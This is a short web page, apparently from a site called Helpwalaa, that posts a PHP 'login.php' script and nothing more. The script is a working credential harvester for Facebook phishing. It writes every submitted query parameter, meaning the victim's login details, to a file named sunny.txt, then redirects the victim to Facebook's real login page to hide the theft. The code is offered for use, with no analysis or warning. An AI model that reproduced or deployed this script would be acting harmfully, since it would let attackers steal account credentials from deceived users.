login.php webcode - Helpwalaa - Free IT Updates & Opportunities

New Updates

login.php webcode

<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1&amp;lwv=111");
$handle = fopen("sunny.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Most Popular